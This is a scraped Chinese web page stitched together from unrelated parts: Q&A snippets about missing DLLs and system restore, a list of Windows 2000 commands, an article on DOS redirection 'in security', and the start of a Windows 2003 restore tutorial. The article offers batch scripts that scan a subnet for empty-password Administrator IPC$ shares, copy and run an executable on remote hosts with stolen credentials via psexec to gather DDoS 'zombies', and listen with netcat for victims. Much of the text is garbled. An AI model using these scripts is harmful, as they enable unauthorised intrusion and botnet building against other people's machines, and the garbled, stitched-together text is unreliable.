笔记本电脑gwrks64.dll丢失中丢失ks0.dll是怎么回事

电脑丢失了CDClient.Dll
在桌面找到“ 我的电脑”,右键点击,选属性,在弹出的窗口中上面选 计算机名 就会看到 完整的计算机名称:xxxx(英文和数字组成的)就是你的主机名,在局域网或网...
你在itunes上找忘记密码试试
电脑的ID号会不会改?
电脑哪里有什么ID啊?
是不是用户名啊?这个可以在重装的时候自己设置的
系统关键动态连接库丢失 可能造成系统崩溃无法启动 确定丢失的具体dll文件 下载一个对应的操作系统的dll复制到相应路径下 [如果我的回答对您有帮助 请点击"好...
答: 平时吃饭的时候不要吃到觉得撑,吃到八分饱,七分饱左右的就可以啦,平时多喝点儿水,多吃点儿水果,蔬菜。
答: 比如常见的网吧电脑用的就是无盘网络技术。
优点:资源共享,节省资金。
缺点:访问速度慢,容易中毒!
答: dos下,输入netsh winsock reset 回车后重起.
或开始--运行--输入cmd --确定--弹出窗口后输入netsh winsock rese...
大家还关注
确定举报此问题
举报原因(必选):
广告或垃圾信息
激进时政或意识形态话题
不雅词句或人身攻击
侵犯他人隐私
其它违法和不良信息
报告,这不是个问题
报告原因(必选):
这不是个问题
这个问题分类似乎错了
这个不是我熟悉的地区
相关问答:123456789101112131415笔记本电脑丢失文件怎么办_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
笔记本电脑丢失文件怎么办
阅读已结束,下载文档到电脑
想免费下载更多文档?
定制HR最喜欢的简历
你可能喜欢笔记本电脑rtutils.dll丢失一键恢复有用吗_百度知道
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。
笔记本电脑rtutils.dll丢失一键恢复有用吗
我有更好的答案
木马、病毒一、rtutils.dll是一个追踪API接口,用于输出诊断信息到微软Microsoft Windows NT/Windows 2000路由和远程控制服务。二、是系统文件,至于为什么提示说丢失了应该是因为中了流氓软件,在下载一个放在C:\WINDOWS\System32\mswsock.dll里三、然后打开“开始-运行-输regsvr32rtutils.dll”,啥的给篡改了,
备份当中如果包含了这个文件,恢复有用,如果能确定是哪个软件的DLL,就重新安装下该软件就行,如果是系统当中的,可以试试一键恢复。
一键还原是不自带的,是要您自己准备的,有什么作用,电脑不好用的时候还原后就还原到备份好用的时候,如果电脑开不了机了就不能还原了,所以不要让您的电脑开不了机了。Win7或8怎么还原系统(有一个前提,如果您的电脑死机、蓝屏、开不了机,还原的方法基本无效,这时就需要重装了) 如果您开启了系统的还原,如果您备份了映像备份,如果您下载了还原软件软件,如果您预装的是正版系统,如果全没有,您就不能还原系统就重装后在做上面的准备,下次在出事就可以还原了。 1)右击计算机选属性,在左侧选系统保护,在保护设置中选择要保护的磁盘,点选上面的还原系统设置和以前版本的文件,在选磁盘使用量大小按确定,保护几个盘就设置几个盘,按上面的方法设置。这样系统会自动备份,也可手动备份,选择这个页面最下面创建,自己创建还原点。还原方法是:Win7或8还原系统,右击计算机选属性,在右侧选系统保护,系统还原,按步骤做就是了。 2)Win7系统还可以使用备份映像功能,打开控制面板/系统和安全/备份和还原/在左侧选择创建系统映像/按步骤和要求做就是了。 Win8创建映像方法:打开控制面板,在系统和安全中选通过文件历史保存你的文件备份副本,在打开的页面左下角等会,会显示Win7文件恢复,在选创建系统映像,按要求做就是了(Win8.1左下不是Win7文件恢复,而是创建系统映像)。 3)如果使用软件备份系统:建议下载“一键GHOST 硬盘版”安装、备份、恢复备份,一键即可十分方便(请搜索下载安装)。 4)预装正版系统还原的方法:(Win7家庭版Win8中文版是正版,专业版以上版本的系统99%是盗版的) 建议咨询品牌客服会告诉您方法,因为品牌不一样,方法也不一样。XP怎么还原系统(有一个前提,如果您的电脑死机、蓝屏、开不了机,还原的方法基本无效,这时就需要重装了) 首先看看是否开启了系统还原: 右击我的电脑选属性/系统还原/去掉“在所有驱动器上关闭系统还原”的勾选,然后按应用。 1)使用系统自带的系统还原的方法:系统自带的系统还原:“开始”/“程序”/“附件”/“系统工具”/“系统还原”,点选“恢复我的计算机到一个较早的时间”,按下一步,你会看到日期页面有深色的日期,那就是还原点,你选择后,点击下一步还原。 2)如果使用软件备份系统: 建议下载“一键GHOST
硬盘版”安装、备份、恢复备份,一键即可十分方便(请您搜索下载安装)。
用360安全卫士的人工服务修复下就行。
其他1条回答
为您推荐:
其他类似问题
一键恢复的相关知识
换一换
回答问题,赢新手礼包您现在的位置:&>&&>& &
核心提示:
Win2000全部命令
_cmd_.exe>没什么好说的!
accwiz.exe>辅助工具向导
acsetups.exe>ACSsetupDCOMserverexecutable
actmovie.exe>直接显示安装工具
append.exe>允许程序打开制定目录中的数据
arp.exe>显示和更改计算机的IP与硬件物理地址的对应列表
at.exe>计划运行任务
atmadm.exe>ATM调用管理器统计
attrib.exe>显示和更改文件和文件夹属性
Win2000全部命令
_cmd_.exe&没什么好说的!
accwiz.exe&辅助工具向导
acsetups.exe&ACSsetupDCOMserverexecutable
actmovie.exe&直接显示安装工具
append.exe&允许程序打开制定目录中的数据
arp.exe&显示和更改计算机的IP与硬件物理地址的对应列表
at.exe&计划运行任务
atmadm.exe&ATM调用管理器统计
attrib.exe&显示和更改文件和文件夹属性
autochk.exe&检测修复文件系统
autoconv.exe&在启动过程中自动转化系统
autofmt.exe&在启动过程中格式化进程
autolfn.exe&使用长文件名格式
bootok.exe&Bootacceptanceapplicationforregistry
bootvrfy.exe&通报启动成功
cacls.exe&显示和编辑ACL
calc.exe&计算器
calc&启动计算器
cdplayer.exe&播放器
certmgr.msc&证书管理实用程序
change.exe&与终端服务器相关的查询
charmap.exe&字符映射表
charmap&启动字符映射表
chglogon.exe&启动或停用会话记录
chgport.exe&改变端口(终端服务)
chgusr.exe&改变用户(终端服务)
chkdsk.exe&磁盘检测程序
chkdsk.exe&Chkdsk磁盘检查
chkntfs.exe&NTFS磁盘检测程序
ciadv.msc&索引服务程序
cidaemon.exe&组成Ci文档服务
cipher.exe&在NTFS上显示或改变加密的文件或目录
cisvc.exe&索引内容
ckcnv.exe&变换Cookie
cleanmgr.exe&磁盘清理
cleanmgr&垃圾整理
cliconfg.exe&SQL客户网络工具
cliconfg&SQLSERVER客户端网络实用程序
clipbrd.exe&剪贴簿查看器
Clipbrd&剪贴板查看器
clipsrv.exe&运行Clipboard服务
clspack.exe&建立系统文件列表清单
cluster.exe&显示域的集群
cmd.exe&CMD命令提示符
cmdl32.exe&自动下载连接管理
cmmgr32.exe&连接管理器
cmmon32.exe&连接管理器监视
cmstp.exe&连接管理器配置文件安装程序
comclust.exe&集群
comp.exe&比较两个文件和文件集的内容*
compact.exe&显示或改变NTFS分区上文件的压缩状态
compmgmt.msc&计算机管理
conf&启动netmeeting
conime.exe&IME控制台
control.exe&控制面板
convert.exe&转换文件系统到NTFS
convlog.exe&转换IIS日志文件格式到NCSA格式
cprofile.exe&转换显示模式
cscript.exe&脚本宿主版本
csrss.exe&客户服务器Runtime进程
csvde.exe&日至格式转换程序
dbgtrace.exe&和TerminalServer相关
dcomcnfg.exe&DCOM配置属性
dcomcnfg&打开系统组件服务
dcphelp.exe&?
dcpromo.exe&AD安装向导
ddeshare.exe&DDE共享
ddeshare&打开DDE共享设置
ddmprxy.exe&
debug.exe&就是DEBUG啦!
devmgmt.msc&设备管理器
dfrg.msc&磁盘碎片整理程序
dfrgfat.exe&FAT分区磁盘碎片整理程序
dfrgntfs.exe&NTFS分区磁盘碎片整理程序
dfs_cmd_.exe&配置一个DFS树
dfsinit.exe&分布式文件系统初始化
dfssvc.exe&分布式文件系统服务器
diantz.exe&制作CAB文件
diskmgmt.msc&磁盘管理实用程序
diskperf.exe&磁盘性能计数器
dllhost.exe&所有COM+应用软件的主进程
dllhst3g.exe&
dmadmin.exe&磁盘管理服务
dmremote.exe&磁盘管理服务的一部分
dns.exe&DNS
doskey.exe&命令行创建宏
dosx.exe&DOS扩展
dplaysvr.exe&直接运行帮助
drwatson.exe&华生医生错误检测
drwtsn32&系统医生
drwtsn32.exe&华生医生显示和配置管理
dtcsetup.exe&InstallsMDTC
dvdplay.exe&DVD播放
dvdplay&DVD播放器
dxdiag.exe&DirectX诊断工具
dxdiag&检查DirectX信息
edlin.exe&命令行的文本编辑器(历史悠久啊!)
edlin.exe&命令行的文本编辑器(历史悠久啊!)
esentutl.exe&MS数据库工具
eudcedit.exe&造字程序
eudcedit&造字程序
eventvwr.exe&事件查看器
eventvwr&事件查看器
evnt_cmd_.exe&Configurationtool
evntwin.exe&Eventtotraptranslatorsetup
exe2bin.exe&转换EXE文件到二进制
expand.exe&解压缩
explorer&打开资源管理器
extrac32.exe&解CAB工具
fastopen.exe&快速访问在内存中的硬盘文件
faxcover.exe&传真封面编辑
faxqueue.exe&显示传真队列
faxsend.exe&发送传真向导
faxsvc.exe&启动传真服务
fc.exe&比较两个文件的不同
find.exe&查找文件中的文本行
findstr.exe&查找文件中的行
finger.exe&一个用户并显示出统计结果
fixmapi.exe&修复MAPI文件
flattemp.exe&允许或者禁用临时文件目录
fontview.exe&显示字体文件中的字体
forcedos.exe&强制文件在DOS模式下运行
freecell.exe&空当接龙
fsmgmt.msc&共享文件夹管理器
&就是FTP了
gdi.exe&图形界面驱动
gpedit.msc&组策略
grovel.exe&
grpconv.exe&转换程序管理员组
help.exe&显示帮助
hostname.exe&显示机器的Hostname
ie4uinit.exe&IE5用户安装工具
ieshwiz.exe&自定义文件夹向导
iexpress.exe&创建安装包
iexpress&木马捆绑工具,系统自带
iisreset.exe&重启IIS服务
internat.exe&键盘语言指示器
ipconfig.exe&察看IP配置
ipsecmon.exe&IP安全监视器
ipxroute.exe&IPX路由和源路由控制程序
irftp.exe&无线连接
ismserv.exe&安装或者删除ServiceControlManager中的服务
jdbgmgr.exe&Java4的调试器
jetconv.exe&转换JetEngine数据库
jetpack.exe&压缩Jet数据库
jview.exe&Java的命令行装载者
krnl386.exe&2000的核心组件
label.exe&改变驱动器的卷标
lcwiz.exe&许可证符合向导
ldifde.exe&LDIF目录交换命令行管理
licmgr.exe&终端服务许可协议管理
lights.exe&显示连接状况
llsmgr.exe&2000许可协议管理
llssrv.exe&启动许可协议服务器
lnkstub.exe&
locator.exe&远程定位
lodctr.exe&调用性能计数
logoff.exe&注销用户
logoff&注销命令
lpq.exe&显示远端的LPD打印队列的状态,显示被送到基于Unix的服务器的打印任务
lpr.exe&重定向打印任务到网络中的打印机。通常用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe&运行LSA和Server的DLL
lserver.exe&指定默认Server新的DNS域
lusrmgr.msc&本机用户和组
macfile.exe&管理MACFILES
magnify.exe&放大镜
magnify&放大镜实用程序
makecab.exe&制作CAB文件
mdm.exe&机器调试管理
mem.exe&显示内存状态
mem.exe&显示内存使用情况
migpwd.exe&迁移密码
mmc.exe&控制台
mmc&打开控制台
mnmsrvc.exe&NetMeeting远程桌面共享
mobsync.exe&同步目录管理器
mobsync&同步命令
mountvol.exe&创建、删除或列出卷的装入点。
mplay32.exe&媒体播放器
mplayer2&简易widnowsmediaplayer
mplayer2&媒体播放机
mpnotify.exe&多提供者通知应用程序
mq1sync.exe&
mqbkup.exe&信息队列备份和恢复工具
mqexchng.exe&信息队列交换连接设置
mqmig.exe&信息队列迁移工具
mqsvc.exe&?
mrinfo.exe&使用SNMP多点传送路由
mscdexnt.exe&安装MSCD
Msconfig.exe&系统配置实用程序
msdtc.exe&动态事务处理控制台
msg.exe&发送消息到本地或远程客户
mshta.exe&HTML应用程序主机
msiexec.exe&开始Windows安装程序
mspaint.exe&画板
mspaint&画图板
msswchx.exe&
mstask.exe&任务计划表程序
mstinit.exe&任务计划表安装
mstsc&远程桌面连接
narrator.exe&Microsoft讲述人
narrator&屏幕&讲述人&
nbtstat.exe&NBT(TCP/IP上的NetBIOS)显示协议统计和当前TCP/IP连接。
nddeapir.exe&API服务器端
netstartmessenger&开始信使服务
netstopmessenger&停止信使服务
net.exe&详细用法看/?
net1.exe&Net的升级版
netdde.exe&安装自己到后台
netsh.exe&用于配置和监控Windows2000命令行脚本接口。
netstatan&(TC)命令检查接口
netstat.exe&显示协议统计和当前的TCP/IP网络连接。
nlsfunc.exe&加载特定国家(地区)的信息。Windows2000和MSDOS子系统不使用该命令。接受该命令只是为了与MSDOS文件兼容。
notepad.exe&记事本
notepad&打开记事本
nslookup.exe&该诊断工具显示来自域名系统(DNS)名称服务器的信息。
Nslookup&IP地址侦测器
nslookup&网络管理的工具向导
ntbackup.exe&备份和故障修复工具
ntbackup&系统备份和还原
ntbooks.exe&帮助
ntdsutil.exe&完成ADSI的DB的维护
ntfrs.exe&NT文件复制服务
ntfrsupg.exe&
ntkrnlpa.exe&核心补丁
ntmsmgr.msc&移动存储管理器
ntmsoprq.msc&移动存储管理员操作请求
ntoskrnl.exe&KT的核心
ntvdm.exe&模拟16位Windows环境
nw16.exe&NetWare转向器
nwscript.exe&运行Netware脚本
odbcad32.exe&32位ODBC管理
odbcad32&ODBC数据源管理器
odbcconf.exe&命令行配置ODBC驱动和数据源
oobe/msoobe/a&检查XP是否激活
os2.exe&AnOS/2WarpServer(os2/o)OS/2
os2srv.exe&AnOS/2WarpServerOS/2
os2ss.exe&AnOS/2WarpServerOS/2
osk.exe&屏幕键盘
osk&打开屏幕键盘
packager.exe&对象包装程序
packager&对象包装程序
pathping.exe&包含Ping和Tracert的程序
pax.exe&启动便携式存档互换(Pax)实用程序
pentnt.exe&检查Pentium的浮点错误
perfmon.exe&性能监视器
perfmon.msc&计算机性能监测程序
ping.exe&验证与远程计算机的连接
posix.exe&用于兼容Unix
print.exe&打印文本文件或显示打印队列的内容。
progman.exe&程序管理器
progman&程序管理器
proquota.exe&Profilequotaprogram
psxss.exe&Posix子系统应用程序
qappsrv.exe&在网络上显示终端服务器可用的程序
qprocess.exe&在本地或远程显示进程的信息(需终端服务)
query.exe&查询进程和对话
quser.exe&显示用户登陆的信息(需终端服务)
qwinsta.exe&显示终端服务的信息
ras.exe&运行RAS连接
rasadmin.exe&启动远程访问服务
rasautou.exe&建立一个RAS连接
rasdial.exe&拨号连接
rcp.exe&在Windows2000计算机和运行远程外壳端口监控程序rshd的系统之间复制文件
rdpclip.exe&在终端和本地复制和粘贴文件
recover.exe&从坏的或有缺陷的磁盘中恢复可读取的信息。
redir.exe&运行重定向服务
regedit.exe&注册表
regedt32.exe&32位注册服务
regedt32&注册表编辑器
regini.exe&用脚本修改注册许可
register.exe&注册包含特殊运行字符的程序
regsvc.exe&
regsvr32/u*.dll&停止dll文件运行
regsvr32/uzipfldr.dll&取消ZIP支持
regsvr32.exe&注册和反注册DLL
regtrace.exe&Trace设置
regwiz.exe&注册向导
remrras.exe&
replace.exe&用源目录中的同名文件替换目标目录中的文件。
reset.exe&重置活动部分
rexec.exe&在运行REXEC服务的远程计算机上运行命令。rexec命令在执行指定命令前,验证远程计算机上的用户名,只有安装了TCP/IP协议后才可以使用该命令。
risetup.exe&运行远程安装向导服务
rononcep&15秒关机
route.exe&控制网络路由表
routemon.exe&不再支持了!
router.exe&Route软件在DOS或者是OS/2系统
rsh.exe&在运行RSH服务的远程计算机上运行命令
rsm.exe&配置远程系统媒体
rsnotify.exe&远程存储通知回显
rsop.msc&组策略结果集
rsvp.exe&源预约协议
runas.exe&允许用户用其他权限运行指定的工具和程序
rundll32.exe&启动32位DLL程序
runonce.exe&运行程序再开始菜单中
rwinsta.exe&重置会话子系统硬件和软件到最初的值
savedump.exe&不写入User.dmp中
scardsvr.exe&子能卡资源管理服务器
schupgr.exe&读取计划更新文件和更新计划
secedit.exe&自动安全性配置管理
secpol.msc&本地安全策略
services.exe&控制所有服务
services.msc&本地服务设置
sethc.exe&设置高对比
setreg.exe&显示软件发布的国家语言
setup.exe&安装程序(转到控制面板)
setver.exe&设置MSDOS子系统向程序报告的MSDOS版本号
sfc/scannow&windows文件保护
sfc.exe&系统文件检查
sfc.exe&系统文件检查器
sfmprint.exe&打印Macintosh服务
sfmpsexe.exe&
sfmsvc.exe&
shadow.exe&监控另外一台中端服务器会话
share.exe&Windows2000和MSDOS子系统不使用该命令。接受该命令只是为了与MSDOS文件兼容
shmgrate.exe&
shrpubw.exe&建立和共享文件夹
shrpubw&创建共享文件夹
sigverif.exe&文件签名验证
sigverif&文件签名验证程序
skeys.exe&序列号制作工具
smlogsvc.exe&性能日志和警报
sndrec32.exe&录音机
sndrec32&录音机
sndvol32.exe&显示声音控制信息
Sndvol32&音量控制程序
snmp.exe&简单网络管理协议
snmptrap.exe&SNMP工具
sol.exe&纸牌
sort.exe&读取输入、排序数据并将结果写到屏幕、文件和其他设备上
SPOOLSV.EXE&打印池服务的一部分
sprestrt.exe&
srvmgr.exe&服务器管理器
stimon.exe&WDMStillImage&Monitor
stisvc.exe&WDMStillImage&Service
subst.exe&将路径与驱动器盘符关联
svchost.exe&DLL得主进程
syncapp.exe&创建Windows文件包
syncapp&创建一个公文包
sysedit.exe&系统配置编辑器
sysedit&系统配置编辑器
syskey.exe&NT账号数据库按群工具
syskey&系统加密,一旦加密就不能解开,保护windowsxp系统的双重密码
sysocmgr.exe&2000安装程序
systray.exe&在低权限运行systray
taskman.exe&任务管理器
taskmgr.exe&任务管理器
taskmgr&任务管理器
tcmsetup.exe&电话服务客户安装
tcpsvcs.exe&TCP服务
termsrv.exe&终端服务
tftp.exe&将文件传输到正在运行TFTP服务的远程计算机或从正在运行TFTP服务的远程计算机传输文件
tftpd.exe&TrivialFTPDaemon
themes.exe&桌面主题
tlntadmn.exe&Telnet服务管理
tlntsess.exe&显示目前的Telnet会话
tlntsvr.exe&开始Telnet服务
tourstart&xp简介(安装完成后出现的漫游xp程序)
tracert.exe&该诊断实用程序将包含不同生存时间(TTL)值的Internet控制消息协议(ICMP)回显数据包发送到目标,以决定到达目标采用的路由
tsadmin.exe&终端服务管理器
tscon.exe&粘贴用户会话到终端对话
tsdiscon.exe&断开终端服务的用户
tskill.exe&杀掉终端服务
tsprof.exe&用终端服务得出查询结果
tsshutdn.exe&关闭系统
tsshutdn&60秒倒计时关机命令
unlodctr.exe&性能监视器的一部分
upg351db.exe&升级Jet数据库
ups.exe&UPS服务
user.exe&Windows核心服务
userinit.exe&Winlogon进程的一部分
usrmgr.exe&域用户管理器
utilman.exe&指定2000启动时自动打开那台机器
utilman&辅助工具管理器
verifier.exe&DriverVerifierManagerDriverVerifierManager
vwipxspx.exe&调用IPX/SPXVDM
w32tm.exe&时间服务器
wextract.exe&解压缩Windows文件
wiaacmgr&扫描仪和照相机向导
winchat.exe&打开Windows聊天
winchat&XP自带局域网聊天
winhlp32.exe&运行帮助系统
winlogon.exe&Logon进程的一部分
winmine.exe&挖地雷
winmsd.exe&系统信息
winmsd&系统信息
wins.exe&服务
winspool.exe&打印路由
winver.exe&显示Windows版本
winver&检查Windows版本
wizmgr.exe&Windows管理向导
wjview.exe&命令行调用Java
wmimgmt.msc&打开windows管理体系结构(WMI)
wowdeb.exe&VM启动时,32位API需要
wowexec.exe&在Windows应用程序上运行Windows
wpnpinst.exe&?
write.exe&写字板
write&写字板
wscript.exe&脚本工具
wscript&windows脚本宿主设置
wupdmgr.exe&运行Windows升级向导
wupdmgr&windows更新程序
xcopy.exe&复制文件和目录,包括子目录
新手DOS应用技巧
人小鬼大 重定向命令在安全方面的应用
来源:ChinaITLab收集整理
  大家知道,DOS下有一个不为大家所常用的命令&&重定向命令,这个小东西非常有用,该命令同样可以用于Win9x/ME/2000/XP下,灵活的使用这个命令可以给我们带来很大的方便&&无论是入侵还是防守抑或是系统应用,都会带来很大的便利。今天就让我们来看几个重定向命令在安全方面的应用实例。
  一、命令格式
  DOS的标准输入输出通常是在标准设备键盘和显示器上进行的,利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中:
  1.大于号&&&将命令发送到文件或设备,例如打印机&prn。使用大于号&&&时,有些命令输出(例如错误消息)不能重定向。
  2.双大于号&&&&将命令输出添加到文件结尾而不删除文件中已有的信息。
  3.小于号&&&从文件而不是键盘上获取命令所需的输入。
  4.&&符号将输出从一个默认I/O流(stdout,stdin,stderr)重新定向到另一个默认I/O流。例如,command &output_file 2&&1将处理command过程中的所有错误信息从屏幕重定向到标准文件输出中。标准输出的数值如下所示:
  标准输出 等价的数值
  Stdin 0
  Stdout 1
  Stderr 2
  其中,1和2都创建一个文件用于存放数据;4可能不能够在DOS下使用。
  二、重定向命令的输出
  几乎所有的命令均将输出发送到屏幕。即使是将输出发送到驱动器或打印机的命令,也会在屏幕上显示消息和提示。要将输出从屏幕重定向到文件或打印机,请使用大于号(&)。大多数命令中均可以使用大于号。例如,在以下命令中,dir命令生成的目录列表重定向到Dirlist.txt文件:dir&dirlist.txt,如果Dirlist.txt文件不存在,系统将创建该文件。如果Dirlist.txt存在,系统将使用dir命令的输出替换文件中的信息。
  要将命令输出添加到文件结尾而不丢失文件中的任何信息,请使用双大于号(&&)。例如,在以下命令中,dir命令生成的目录列表附加到Dirlist.txt文件中:dir&dirlist.txt,将输入重定向到一个命令,就象可以将命令输出发送到文件或打印机而不是屏幕一样,您可以从文件而不是从键盘获取命令的输入。要从文件获取输入,请使用小于号(&)。例如,以下命令将从List.txt文件中获取sort命令的输入:sort
  三、应用举例
  1.给注册表加锁/解锁
  大家知道,注册表HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVerssionPoliciesSystem分支下的DWORD值&Disableregistrytools&的键值如为&1&,则可以给注册表加锁,这样别人就无法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁,非常方便。
  打开记事本程序,新建一个文本文件,输入如下内容:
  @echo REGEDIT4&&123.reg
  @echo.&&123.reg
  @echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]&&123.reg
  @echo &DisableRegistryTools&=dword:3.reg
  @REGEDIT /S /C 123.reg
  @deltree /y 123.reg
  另存为以.bat为扩展名的批处理文件,点击这个文件注册表就会被锁定!
  在上面的命令中,echo是DOS下的回显命令,在它的前面加上&@&前缀字符,表示执行时本行在命令行或DOS里面不显示,如果想看到程序执行过程,请将&@&去掉。大家在编写上述代码时要注意的是,第一行中的&REGEDIT4&一定要用大写字母,在第二行中&echo&和&.&之间没有空格。&&&&产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以无需确认就删除123.reg文件。
  要想给注册表解锁,可以编辑这个批处理文件,只需将&DisableRegistryTools&=dword:改为&DisableRegistryTools&=dword:,其他内容不变,保存为.bat文件,点击就可以给注册表解锁了。
  2.把登陆3389的机器IP记录下来
  把下面的内容保存为3389IP.bat:
  time /t &&log.log
  netstat -n -p tcp |find &:3389&&&Log.log
  start Explorer
  运行3389IP.bat,然后查看log.log文件即可看到登陆3389的机器IP,是不是很方便呢?
  3.恢复DOS实模式
  大家知道,某些恶意网页会修改浏览者的注册表,在无所不用其极的各种手段中,修改注册表使DOS实模式不可用是其中的招数之一。要想恢复DOS实模式方法有很多,用批处理和重定向命令结合使用,是比较特别的一招,在此与大家分享。
  echo off
  echo REGEDIT4&c:scanreg.reg
  @echo.&&lock.reg
  echo [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesWinOldApp]&&c:scanreg.reg
  echo &NoRealMode&=dword:&&c:scanreg.reg
  regedit /s c:scanreg.reg
  @del c:scanreg.reg
  另存为以.bat为扩展名的批处理文件,点击这个文件就可以恢复DOS实模式,那些DOS应用程序又可以使用了。
  4.等待肉鸡上门
  每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:
  @echo off
  :start
  nc -vv -w 5 -l -p 80&&rouji.log
  goto start
  保存为.bat文件(事先得准备好一个nc.exe文件,它是网络故障事件检测软件Netcat的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天10个不成问题。
  5.快速进行空连接
  空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use
&& /user:&& 就可以简单地和目标建立一个空连接(需要目标开放IPC$)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件中供你分析。方法是用记事本编辑如下内容的文件:
  @echo off
  echo 格式:test *.*.*&test.txt
  for /L %%G in (1 1 254) do echo %1.%%G &&test.txt & net use %1.%%Gipc$ && /use:&Administrator& | find &命令完成& &&test.txt
  批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters],具体的含义:
  %variable:指定一个单一字母可替换的参数。
  (set):指定一个或一组文件。可以使用通配符。
  command:指定对每个文件执行的命令。
  command-parameters:为特定命令指定参数或命令行开关。
  在批处理文件中使用FOR命令时,指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的,所以%i不同%I。
  6.禁止空连接
  空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入net share察看本地共享资源,接下来输入如下命令删除共享:
  net share ipc$ /delete
  net share admin$ /delete
  net share c$ /delete
  net share d$ /delete(如果有e,f等盘符可以同法删除)
  然后用记事本新建一个文本文件,输入如下内容即可:
  @echo REGEDIT4&&123.reg
  @echo.&&123.reg
  @echo [HKEY_LOCAL_MACHINESystemCurrentControlSetControlLSA]&&123.reg
  @echo &RestrictAnonymous&=dword:3.reg
  @REGEDIT /S /C 123.reg
  @deltree /y 123.reg
  另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。
  7.扫描所有和本机以TCP协议连接的计算机
  扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:
  data /t&&123.log
  time /t&&123.log
  netstat -n -p tcp 10&&123.log
  这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。
  8.自动获取DDoS肉鸡
  DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。
  虽然不建议大家使用DDoS方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行DDoS攻击的肉鸡呢?把下面的内容保存为ok.bat文件就可以达到目的了:
  @echo off
  echo自动获取DDoS肉鸡
  for /f &tokens=1,3*& %i in (host.txt) do net use
/user:&%j&
  copy %1
  if errorelevel 0 goto success
  psexec -d
c:winntsystem32%1
  net user
  :success
  echo ------------------------------&&success.txt
  echo 肉鸡:%i&&success.txt
  echo 用户名:%j&&success.txt
  echo 密码:%k&&success.txt
  echo ------------------------------&&success.txt
  使用方法是ok.bat *.exe host.txt,其中host.txt的格式为:ip administrator password。好了,快试试吧。但不要用来干破坏哦。
  其实,本文所说的方法主要是利用了批处理和相关的命令,重定向命令在其中只是个&传接剂&,起连接作用,但它的功劳也是不小的,所以我们不要忘了重定向命令哦。本文只是抛砖引玉,希望大家畅所欲言,多多指点。在写作时参阅过众多高手的论坛帖子,多谢各位。
转载&让Windows 2003也用上系统还原&
让Windows 2003也用上系统还原
发表时间: 23:17 浏览人数:23 发布者:ylpx&
用过Windows XP的用户都知道,在Windows XP中有一个很贴心、很实用的功能&&系统还原。该功能在系统运行正常时可以自动地创建多个还原点,当系统出现问题后可以帮助用户非常方便地还原到以前的某一个还原点,快速恢复系统。不过,在号称是Windows XP服务器版的Windows 2003中,微软并没有集成该功能,这不能不令许多喜爱系统还原功能的用户感到遗憾。今天,就让我们充分发扬一下DIY精神,将Windows XP中的系统还原功能移植到Windows 2003中!请先准备好一张Windows XP安装光盘,然后就跟我来吧:
  第1步:进入到Windows 2003操作系统中,将Windows XP安装光盘插入光驱的同时按住Shift键取消其自动运行。单击&开始&运行&命令,在运行对话框中输入&cmd&后回车,打开命令提示符窗口。在命令提示符后面输入&expand X:i386sr.in_ C:sr.inf&后回车,将Windows XP安装光盘i386目录下的sr.in_提取到C盘根目录下。其中,X指光驱的盘符,用户请根据自己的实际情况做适当修改。
  第2步:打开资源管理器,在C盘的根目录下用鼠标右键单击刚刚释放出来的sr.inf文件,选择&安装&命令,开始复制文件。在安装过程中,安装程序会提示你找不到某些文件,此时请单击提示对话框的&浏览&按钮,定位到Windows XP安装光盘的i386目录,然后单击&确定&按钮即可。
&&& 第3步:安装完毕后系统会给出&系统设置改变&的提示,并要求重新启动计算机。重新启动计算机时,在启动过程中会出现错误提示,不必理会,直接单击&确定&按钮将其取消。
  第4步:单击&开始&运行&命令,在打开的运行对话框中键入&regedit&后回车打开注册表编辑器。依次展开[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSvcHost]分支,在右侧窗口中找到名为&netsvcs&的多字符串值(如果没有请在右侧窗口中单击鼠标右键,选择&新建&多字符串值&),双击打开&编辑多字符串&窗口,在&数值数据&文本框中输入以下内容(注意:为了描述方便,在本文中每项之间用分号隔开,在实际输入时,每项要占一行,也就是输完一项后要按一下回车键到下行继续输入)
